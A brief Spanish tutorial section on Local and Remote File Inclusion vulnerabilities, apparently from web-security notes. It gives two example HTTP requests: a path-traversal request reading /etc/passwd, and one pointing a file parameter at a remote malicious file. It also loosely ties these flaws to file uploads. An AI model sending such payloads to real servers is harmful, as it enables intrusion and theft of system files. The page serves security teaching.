7. LFI/RFI
Estas vulnerabilidades afectan a la subida de ficheros en una aplicación web.
1. Local File Inclusion
Acceso a ficheros dentro de un mismo servidor, ejecutando código en la aplicación para acceder a recursos del servidor.
GET dominio.meow/ejemplolfi.php?file=../../../etc/passwd HTTP/1.1
2. Remote File Inclusion
Acceso a ficheros en servidores remotos.
GET dominio.meow/ejemplorfi.php?file=dominioRemoto/ficheroMalicioso HTTP/1.1
Recursos:
Last updated
Was this helpful?